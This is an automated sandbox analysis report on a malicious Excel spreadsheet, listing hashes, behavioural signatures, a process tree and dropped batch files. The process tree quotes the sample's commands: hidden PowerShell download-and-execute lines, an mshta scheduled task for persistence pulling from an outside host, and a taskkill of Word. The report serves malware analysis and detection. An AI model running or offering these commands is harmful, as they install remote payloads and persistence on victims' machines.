Analysis
- max time kernel: 102s
- max time network: 127s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 16-08-2022 07:45
Behavioral task: behavioral1
- Sample: SecuriteInfo.com.Exploit.Siggen3.17232.23052.xls
- Resource: win7-20220812-en
Behavioral task: behavioral2
- Sample: SecuriteInfo.com.Exploit.Siggen3.17232.23052.xls
- Resource: win10v2004-20220812-en
General
- Target: SecuriteInfo.com.Exploit.Siggen3.17232.23052.xls
- Size: 33KB
- MD5: 7f57f9f35e9465cfc8fbac31913db94e
- SHA1: d35cb428f2f57ce38f7c6e71e128bce88fc5fd58
- SHA256: 78f4a26a6d9e52be09cda8edeef93c3f2886ef7cdda107e49c88dbf5bfe3c962
- SHA512: 3f2e965a49bac3cc2a29fb37cd91976e379b74f697d933fe6b8f648e2c031c465fb63c6eedc94832dc404389577ff86e8d8f8b48938df03757100657fd182999
Malware Config
Signatures

Process spawned unexpected child process (4 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (child pid, child process, parent pid, parent process):
- Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process: 4944 cmd.exe, parent 2096 EXCEL.EXE
- Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process: 2040 cmd.exe, parent 2096 EXCEL.EXE
- Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process: 1060 cmd.exe, parent 2096 EXCEL.EXE
- Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process: 3500 cmd.exe, parent 2096 EXCEL.EXE

Blocklisted process makes network request (2 IoCs)
Processes (flow, pid, process):
- flow 16, pid 2348, powershell.exe
- flow 33, pid 3212, powershell.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
- EXCEL.EXE: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
- EXCEL.EXE: key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
- EXCEL.EXE: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
- EXCEL.EXE: key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
- EXCEL.EXE: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
- EXCEL.EXE: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Kills process with taskkill (1 IoCs)
Processes:
- pid 4868 taskkill.exe

Runs ping.exe (1 TTPs, 4 IoCs)
Processes:
- pid 1760 PING.EXE
- pid 1572 PING.EXE
- pid 2116 PING.EXE
- pid 1780 PING.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes:
- pid 2096 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
- pid 2348 powershell.exe (recorded twice)
- pid 3212 powershell.exe (recorded twice)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
- Token: SeDebugPrivilege, pid 4868 taskkill.exe
- Token: SeDebugPrivilege, pid 2348 powershell.exe
- Token: SeDebugPrivilege, pid 3212 powershell.exe

Suspicious use of SetWindowsHookEx (12 IoCs)
Processes:
- pid 2096 EXCEL.EXE (recorded 12 times)

Suspicious use of WriteProcessMemory (32 IoCs)
Processes (each parent/child pair is recorded twice in the report):
- PID 2096 EXCEL.EXE wrote to memory of 4944 cmd.exe
- PID 2096 EXCEL.EXE wrote to memory of 2040 cmd.exe
- PID 2096 EXCEL.EXE wrote to memory of 3500 cmd.exe
- PID 2096 EXCEL.EXE wrote to memory of 1060 cmd.exe
- PID 2040 cmd.exe wrote to memory of 1760 PING.EXE
- PID 1060 cmd.exe wrote to memory of 1572 PING.EXE
- PID 4944 cmd.exe wrote to memory of 1780 PING.EXE
- PID 3500 cmd.exe wrote to memory of 2116 PING.EXE
- PID 3500 cmd.exe wrote to memory of 5040 cmd.exe
- PID 5040 cmd.exe wrote to memory of 2348 powershell.exe
- PID 3500 cmd.exe wrote to memory of 4048 cmd.exe
- PID 4048 cmd.exe wrote to memory of 4868 taskkill.exe
- PID 4944 cmd.exe wrote to memory of 2204 cmd.exe
- PID 2204 cmd.exe wrote to memory of 3212 powershell.exe
- PID 2040 cmd.exe wrote to memory of 2176 cmd.exe
- PID 2176 cmd.exe wrote to memory of 2576 schtasks.exe
Processes (indented by nesting depth)

- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  command: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.23052.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SYSTEM32\cmd.exe
    command: cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    - C:\Windows\system32\PING.EXE
      command: ping -n 80 127.0.0.1
      - Runs ping.exe

    - C:\Windows\system32\cmd.exe
      command: cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
      - Suspicious use of WriteProcessMemory

      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\SYSTEM32\cmd.exe
    command: cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    - C:\Windows\system32\PING.EXE
      command: ping -n 85 127.0.0.1
      - Runs ping.exe

    - C:\Windows\system32\cmd.exe
      command: cmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
      - Suspicious use of WriteProcessMemory

      - C:\Windows\system32\schtasks.exe
        command: schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
        - Creates scheduled task(s)

  - C:\Windows\SYSTEM32\cmd.exe
    command: cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    - C:\Windows\system32\PING.EXE
      command: ping -n 7 127.0.0.1
      - Runs ping.exe

  - C:\Windows\SYSTEM32\cmd.exe
    command: cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    - C:\Windows\system32\PING.EXE
      command: ping -n 10 127.0.0.1
      - Runs ping.exe

    - C:\Windows\system32\cmd.exe
      command: cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
      - Suspicious use of WriteProcessMemory

      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\system32\cmd.exe
      command: cmd /c start /min taskkill /f /im WINWORD.EXE
      - Suspicious use of WriteProcessMemory

      - C:\Windows\system32\taskkill.exe
        command: taskkill /f /im WINWORD.EXE
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 2a0bc0fac096c06f079b79e8b4da255b
  SHA1: 7126e9868bff4fa7cac79503879934671af74ac3
  SHA256: c97149dab3072de77ceb9fb69a793cb95ace7162fc49982c9d406a285ed19787
  SHA512: a7f6548d8e85c48bbb5a5066c28af2fd899d078aad733f0544ed9f5dcc624f745c05fc41a8060acb318709260549938a074e2613b9fdc15f203d995ac532ff4d

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 6KB
  MD5: 3159606cc69435c1ac83f707fee10f4a
  SHA1: 486497233fbf6f8de6f873e2f85cd5f0a9d8a94a
  SHA256: 958553a81c73b987a925a905287457da70cea1d9b7ab7e89716596333ae41448
  SHA512: 2ae28aeada9723c8912500b2ab0ed63e0a65658a428cb4e6ed02d5021b9c112e0a16be21e7fb18354b6aad0f66fe805b7f82847c66d856445115dd356c16375f

- C:\Users\Public\DefenderFile.bat
  Filesize: 1KB
  MD5: ae4a0997ce01f4ebbb3f3cc0054ce933
  SHA1: e5bfe3b390f1208b8b6ea0317f4364005f552851
  SHA256: a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce
  SHA512: 5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

- C:\Users\Public\Outlook.bat
  Filesize: 900B
  MD5: 0427a3545c2eaed3167cffe2cf5f8aba
  SHA1: b27f3a7d2b855f1d0b84727603add711bb6f6170
  SHA256: ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391
  SHA512: fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

- C:\Users\Public\task.bat
  Filesize: 954B
  MD5: 20a395a26f50352dc994664c3e7df533
  SHA1: 9b6407d22297b7af7c49aacd51bf42e51ced7029
  SHA256: c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32
  SHA512: 2b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617